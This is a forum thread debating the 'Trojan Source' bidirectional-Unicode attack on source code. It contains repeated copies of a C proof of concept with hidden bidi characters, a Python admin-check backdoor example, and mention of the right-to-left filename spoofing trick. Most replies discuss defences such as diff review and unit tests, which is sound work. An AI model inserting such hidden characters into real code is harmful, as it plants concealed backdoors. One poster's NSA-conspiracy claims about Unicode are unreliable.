Author

Topic: !!! RED ALERT: SHIELDS UP, TROJAN SOURCE HAS ARRIVED !!! (Read 489 times)

newbie
Activity: 58
Merit: 0
seems like fear pronz to me
legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always as does just about everyone I know do everything locally and then push it up to github or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

I don't code much, but most people i know still code locally. But maybe it's because internet speed/stability isn't good enough to have good experience with online code editor.

The thing that alarmed me is that this-executes-exe.txt actually worked in windows 7.

Basically the exe.txt get's swapped, so the real filename is this-executes-txt.exe.

Windows 7 no longer receive security update, so those who still use it are vulnerable to more common malware/trojan/ransomware.

P.S. I know there's "Extended Security Updates" for Windows 7, but only corporation with legacy software who would pay for it.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
The thing that alarmed me is that this-executes-exe.txt actually worked in windows 7.

Basically the exe.txt get's swapped, so the real filename is this-executes-txt.exe.

It only works on Windows, as more sane operating systems will classify the file based on its MIME type (by, you know, actually inspecting the file contents)
full member
Activity: 385
Merit: 110
Well mean while, I have read the entire document, looked at examples, looked at what professor mentions is vunerable software basically all webbrowsers <- that is big.

If this was known then why is it not fixed ? Clearly it wasn't know or people didn't take it seriously, I'll let you choose.

Paying 8010 or 1080 is a big deal this could be fooled on the web.

Anyway I also googled around found some doc about hacking unicode, apperently in that doc this was also know.

The thing that alarmed me is that this-executes-exe.txt actually worked in windows 7.

Basically the exe.txt get's swapped, so the real filename is this-executes-txt.exe.

I have never seen such a thing in all these years of windows usage ! That totally shocked me. SO BEWARE !

For now I have calmed down somewhat, totally calm now...

There is babelmap an babeleditor that can be used to experiment with unicode and control characters ! Wink Have fun ! =D

I also worry about magnetlinks from whatever reason... my spider-sense till me somebody is going to do something bad with it.

Or how about URI payments ! AH YES ! URI payments would be the perfect way to fool USERS.

HOLYSHIT.

Bye for now,
  Skybuck.
copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7
Good point. But i doubt his test is meaningful since SMF (Simple Machines Forum) is written in PHP while he posted C code.

What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always as does just about everyone I know do everything locally and then push it up to github or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

-Dave



Completely agree. I have seen some of these cloud IDE's such as Cloud9 (which is amazon now I think) and their interface cant offer half the functionality of what something like PyCharm, PHPStorm or VSCode can. Especially with the Git integration.
I might be willing to use a cloud IDE that saves my work-in-progress to the cloud but still has the capability to perform GIT functions to the applicable branch of the repo I am working on. This might cut back on commits to my branch if I am pulled away from working on something unexpectedly, for example.

I would not be particularly comfortable with an IDE that saves in real-time without the ability to commit my changes. This would make it difficult to undue changes that break something, or that is later decided against implementing.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
Completely agree. I have seen some of these cloud IDE's such as Cloud9 (which is amazon now I think) and their interface cant offer half the functionality of what something like PyCharm, PHPStorm or VSCode can. Especially with the Git integration.

Cloud9 is just a mashup of an editor, terminal, and file browser (and another terminal that masquerades as a gdb debugger). There's no extension functionality of all, and I believe you're stuck with whatever linters Cloud9 ships with as well (pylint, eslint, etc.) In most cases there is no semantic/runtime error checking of any kind.

It's completely stupid to host your only local copy on the cloud though, I've lost code from AWS terminating my account and having Cloud9 as my only local source. Luckily I had pushed an old copy to a private self-hosted Gitea instance beforehand, after almost 'rm-ing my entire project folder.
jr. member
Activity: 77
Merit: 7
Good point. But i doubt his test is meaningful since SMF (Simple Machines Forum) is written in PHP while he posted C code.

What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always as does just about everyone I know do everything locally and then push it up to github or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

-Dave



Completely agree. I have seen some of these cloud IDE's such as Cloud9 (which is amazon now I think) and their interface cant offer half the functionality of what something like PyCharm, PHPStorm or VSCode can. Especially with the Git integration.
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
Good point. But i doubt his test is meaningful since SMF (Simple Machines Forum) is written in PHP while he posted C code.

If you go though all the crap that that account has been posting for the 10 years it's been here, you can see a lot of nonsensical rambling postings. With a bit of paranoia sprinkled in.

That and the total inability to use the code tags.

As I said and others have pointed out, this vulnerability has been known for years. But since some news outlets picked it up, it's now 'important'.

What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always as does just about everyone I know do everything locally and then push it up to github or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

-Dave

copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7

Something along the below would need to be inserted into the codebase in order for someone to potentially gain administrative access:
Code:
def admin_check(uid, admin_uids):
    '''
    checks if a uid belongs to an administrator
   
    inputs:
    uid: int username identification number of account being checked
    admin_uids: list, each item in list is the uid of an admin
   
    returns:
    boolean will be False if uid is not in admin_uids, otherwise function will
    return True
    #an invisible char will cause the docstring to end two lines up
    '''
    for uid_ in admin_uids:
        if uid == uid:
            return True
    return False
So the actual code the compiler sees is:
Code:
def admin_check(uid, admin_uids):
    '''
    checks if a uid belongs to an administrator
   
    inputs:
    uid: int username identification number of account being checked
    admin_uids: list, each item in list is the uid of an admin
   
    returns:
    boolean will be False if uid is not in admin_uids, otherwise function will'''
    return True
    #an invisiable char will cause the docstring to end two lines up
    ''''''
    for uid_ in admin_uids:
        if uid == uid:
            return True
    return False
As you can see, the above function will go from checking the UID and comparing it to the UIDs in the admin_uids, it will simply return True when called.

The above should be caught when running unit tests. Even without being caught via unit tests, it should be fairly clear that something is wrong because everyone would have admin access. The bigger risk is if the above was a method in a class that gets inherited by other classes that are used, and are very rarely called. If someone can get a server to call the above method, they could gain administrative access.

When someone installs a library their software depends on, it will download that library and any dependencies to that library to their local computer. So if your server uses some_library_that_depends_on_malicious_libraryA you can trivially check malicious_libraryA (and all other libraries) for invisible characters.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
Skybuck, you do know there are lucrative bounties by theymos for finding a vuln in forum software (and disclosing it privately), right?
full member
Activity: 385
Merit: 110
Anyways, it's time to test some of this code.

TEST 1 CODE section: OK SAFE

Code:
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TEST 2 QUOTE: OK SAFE

Quote
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TEST 3 JUST WEB COPY:, OK SAFE

#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TELETYPE: OK SAFE

#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


SUPERSCRIPT: OK SAFE
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


SUBSCRIPT: OK SAFE

#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


#include
#include

Table column: OK SAFE
int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TABLE: OK SAFE
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}
GLOW: OK SAFE

#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


SHADOW: OK SAFE
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


strikethrough: ok safe
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


LIST: OK SAFE
  • #include
    #include

    int main() {
        bool isAdmin = false;
        /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
            printf("You are an admin.\n");
        /* end admins only  { ⁦*/
        return 0;
    }

right align: OK SAFE
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

centered: OK SAFE
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

preformatted text: OK SAFE
#include 
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


left align: OK SAFE
#include
#include

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

THIS FORUM SOFTWARE IS PRETTY GOOD AND SAFE ! LOL. though that right align is a bit whack ! HAHA.

FOR NOW THIS FORUM SOFTWARE IS SKYBUCK APPROVED ! =D
full member
Activity: 385
Merit: 110
This casts big doubts on the whole UNICODE system you might as well consider it a GIGANTIC NSA conspiracy to make all of our systems WEAK and HACKABLE.
Come on, you know better than to label security bugs as NSA conspiracies like this.

The vulnerabilities are skyrocketing. ?You also notice it in the news, yet another ransomware attack, or failure of something.

Most ransomware are the result of companies who are running old outdated software with ancient vulnerabilities, not by some funky stuff on last year's DEFCON or Black Hat World.


Unfortunately NSA is not conspiracy theory, they have hacked about anything they can get their paws on and more ! LOL. The most funny one was hacking the POPE. He not talking to GOD, he talking to NSA.

Try to also look towards the future... how all of this can be exploited by scammers !

For bitcoin and other financial systems, swapping financial numbers comes to mind.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
This casts big doubts on the whole UNICODE system you might as well consider it a GIGANTIC NSA conspiracy to make all of our systems WEAK and HACKABLE.
Come on, you know better than to label security bugs as NSA conspiracies like this.

The vulnerabilities are skyrocketing. ?You also notice it in the news, yet another ransomware attack, or failure of something.

Most ransomware are the result of companies who are running old outdated software with ancient vulnerabilities, not by some funky stuff on last year's DEFCON or Black Hat World.
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
Such attack should be detected easily using command git diff or GitHub compare features (on pull request or between different commit). Besides, even if the pull request/commit is accepted, it'll take before it's shipped as new version and there's time to detect such change.

I've been looking around and for the real tech people it all seems to be a big nothing.
The people who get paid to discuss things and don't understand it seem to be running around screaming "the sky is falling"
Since, as you said, it will show up in any compare check and anything that does not display unicode which many desktop compilers don't. It sounds scarier then it really is.

I would really be more concerned about a real vulnerability like this: https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html

-Dave
legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
Such attack should be detected easily using command git diff or GitHub compare features (on pull request or between different commit). Besides, even if the pull request/commit is accepted, it'll take before it's shipped as new version and there's time to detect such change.
full member
Activity: 385
Merit: 110
My first unicode bug discovery:

It was actually my deep dive into a bitcoin label/text/display bug, a long time ago, that alerted me for the first time of bugs in unicode implementations (windows, bitcoin used old vunerable api, instead of api_ex)

Now that I have dig deeper into the unicode standard a lot of puss is coming out:

Examples:

"The directional formatting characters are used only to influence the display ordering of text. In all other respects they should be ignored—they have no effect on the comparison of text or on word breaks, parsing, or numeric analysis."

"When working with bidirectional text, the characters are still interpreted in logical order—only the display is affected. The display ordering of bidirectional text depends on the directional properties of the characters in the text. Note that there are important security issues connected with bidirectional text: for more information, see [UTR36]."

^ And then the bomb of bombs:

https://www.unicode.org/reports/tr36/

^Unicode Security Considerations:
(Visual Security Issues, Internationalized Domain Names,Mixed-Script Spoofing,Single-Script Spoofing,Inadequate Rendering Support,Malicious Rendering,Bidirectional Text Spoofing,Glyphs in Complex Scripts,Syntax Spoofing,Missing Glyphs,Numeric Spoofs,IDNA Ambiguity,Punycode Spoofs UTF-8 Exploits ,Ill-Formed Subsequences,Substituting for Ill-Formed Subsequences,Text Comparison (Sorting, Searching, Matching) ,Buffer Overflows,Deletion of Code Points,Illegal Input Byte Sequences)

Damn they know about it too! Well thank you for making all our systems so unsafe!

Whoever thought that something as simple as our alphabet and text was safe, will be very disappointed!
.
.
.
.

So it turns out UNICODE is full of security bugs and considerations. YIKES !

This casts big doubts on the whole UNICODE system you might as well consider it a GIGANTIC NSA conspiracy to make all of our systems WEAK and HACKABLE.

Even if it's not a conspiracy the vunerabilities are sky-rocketing leading me to write the following text for you all:
.
.
.
.
Stop or slow down digitization.

Unfortunately and with a heavy heart I have to conclude that digitization is going too fast and appears to be too vulnerable.

Also thanks to politicians who pay academics to find vulnerabilities in hardware/equipment and software/codes.

In recent years, bangers of cracks/holes/vulnerabilities have been found in hardware/devices and software/codes.

Most of which have yet to be used by criminals.

We have a lot of trouble ahead of us.

The vulnerabilities are skyrocketing. ?You also notice it in the news, yet another ransomware attack, or failure of something.

It really can't go on like this.

I advise everyone to ask for or even stop digitization to give computer programmers and hardware programmers/designers/makers the time to plug gaps.

Finally, a personal touch, please don't abolish the teletext because I think that's fantastic lol, and we might regret the disappearance of the giro collection.

Please keep some non-digital systems standing! Wink and also simpler systems/broadcast systems such as teletext Wink
.
.
.
.
.
For bitcoin I will make an exception, the world may need an alternative currency system vs dollar/euro etc ! Wink

So keep working on BITCOIN ! =D

Update: Concerning the digitization:

Here's a simple idea how to do that:

Every information system that is used in the Country will be put on a list.

This list must then be completed/processed/treated by "security specialists".

They then go through systems on that list looking for vulnerabilities.

These must then be resolved.

There may be 1000 systems on that list.

After that, no new system may be added in the Country until that list has been reduced to 1000 or less.

1000 is an example it can also be more or less depending on what is sensible Smiley

Greetings,
  Skybuck.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
I don't get why can't someone just code a small program to strip the UTF8 format characters out of the file in the first place? Even better if this functionality was integrated in git with a setting to disable it for individual files (eg. Those in RTL languages).
HCP
legendary
Activity: 2086
Merit: 4363
I haven't even read this document fully yet
Maybe come back and let us know what you think after you have actually read the document fully.


Fake vaccines, now we have FAKE SHIELDS and FAKE CODE LOL ! =D
This forum needs a #facepalm emoji... Roll Eyes Roll Eyes Roll Eyes
copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7
I think the risks of this kind of attack is fairly low. The maintainers of most repos are not going to allow for random changes to comments or to docstrings.

Yeah, I feel like malicious code changes similar to the proof of concepts in the paper would immediately raise some eyebrows. Not even for fear of invisible characters but because no one wants arbitrary, unhelpful comments sprinkled all over their code. Worse still, if the reviewer is aware of the existence of this kind of attack, the code and commenting style that is required to sneak unwanted logic in will immediately draw attention to itself. You might as well try your luck with an openly visible exploit that is accompanied by a comment that says "// totally not an exploit".

It is a fun attack vector but I don't think it's a very practical one, even ignoring the ease with which such an attempt can be thwarted on the compiler or editor level.
When a pull request is being reviewed, all changes to the code (including comments) are highlighted, and all changes need to be justified. If someone is asking for a comment to be added to a method when no changes are being made to the method, nor has there been any confusion about the method by the userbase, the change will probably be rejected.

If a new function or method is being introduced into a codebase, there might be a bigger risk that the new function or method does not execute as it appears.

Unit testing should also catch these types of attacks. If someone modified code in order to get it to execute in a way that is different than is intended, unit tests for the affected function should fail.
legendary
Activity: 3150
Merit: 2185
Playgram - The Telegram Casino
I think the risks of this kind of attack is fairly low. The maintainers of most repos are not going to allow for random changes to comments or to docstrings.

Yeah, I feel like malicious code changes similar to the proof of concepts in the paper would immediately raise some eyebrows. Not even for fear of invisible characters but because no one wants arbitrary, unhelpful comments sprinkled all over their code. Worse still, if the reviewer is aware of the existence of this kind of attack, the code and commenting style that is required to sneak unwanted logic in will immediately draw attention to itself. You might as well try your luck with an openly visible exploit that is accompanied by a comment that says "// totally not an exploit".

It is a fun attack vector but I don't think it's a very practical one, even ignoring the ease with which such an attempt can be thwarted on the compiler or editor level.
copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7
My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !
It looks like a solution has already been found.

I think the risks of this kind of attack is fairly low. The maintainers of most repos are not going to allow for random changes to comments or to docstrings.

In addition to throwing warnings when invisible chars is used, much of this vulnerability could be eliminated by using "returns" vs "return", standardizing when/where comments are allowed, and disallowing comments and docstrings to contain anything that would execute as code if it were not commented out.
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
This has been known for YEARS and until some non programmers and clueless media people got a hold of it nobody cared.
This is one example I found dated 2017: https://github.com/golang/go/issues/20209
There is at least one more from a bit earlier that I can't find that more or less said the same thing.

Only people who don't program a lot or get paid to scare people think it's a big deal.
Edit take a look at: https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146 you may have to create an account to see it.
-Dave
full member
Activity: 385
Merit: 110
If it was Star Trek, this would be the point where you're bombarded with so much gunfire that your shields drop to 6% or you have to abandon ship  Wink

But I call bullshit on that paper. Simply running an xterm or other CMD/terminal that only supports ANSI character sets will mitigate this by making the code appear to be the malicious gibberish it really is.



My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !

I don't think you've maintained an open source project but if you have you would know that it is clearly impossible to do this without opening yourself up more gunfire unpatched vulnerabilities.

If this was Star Trek hmmm.... then we would believe our shields are ON while they are OFF lol.

Trigger:
if Shield = "OFF" then Shield = "ON"

Anyway... at least you admit there is a big fat problem by switching to CMD.exe, no more project source files for you, no more fancy pancy development environment for you ! LOL.

I wonder how many bugs/hints/warning messages are missed by CMD.EXE ! Wink

CMD.EXE on Windows 7 is immune indeed, not sure about powershell on Windows 11.

Anyway have fake with your fake shields ! LOL.

Fake vaccines, now we have FAKE SHIELDS and FAKE CODE LOL ! =D

Anyway on a more serious note, GITHUB has taken some precautions which can be seen here:

https://github.com/nickboucher/trojan-source/blob/main/C/commenting-out.c

and here:

https://github.blog/changelog/2021-10-31-warning-about-bidirectional-unicode-text/

So not all is bad.

Github was recently purchased by Microsoft, makes me wonder... are they trying to cover up something ?
jr. member
Activity: 77
Merit: 7
Also, this is not so different to supply chain attacks if this was committed to a library. As a cybersecurity analyst, we vet any software and new updates in a sandbox before releasing them to production. We also have other security tools in place to stop malicious behaviour or alert us if any malicious behaviour is found.

Also agree on the command line with NotATether, most only support ANSI.

I could see in some cases how this can be a problem, but papers like this are only useful to bring information like this to the masses and people in cybersecurity as something to look out for. I doubt there are many of these attacks being exploited in the wild.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
If it was Star Trek, this would be the point where you're bombarded with so much gunfire that your shields drop to 6% or you have to abandon ship  Wink

But I call bullshit on that paper. Simply running an xterm or other CMD/terminal that only supports ANSI character sets will mitigate this by making the code appear to be the malicious gibberish it really is.



My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !

I don't think you've maintained an open source project but if you have you would know that it is clearly impossible to do this without opening yourself up more gunfire unpatched vulnerabilities.
full member
Activity: 385
Merit: 110
I haven't even read this document fully yet, but all signs point to MAJOR TROUBLE AHEAD for open source projects:

https://www.trojansource.codes/trojan-source.pdf

My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !

Bye for now,
  Skybuck.
Jump to: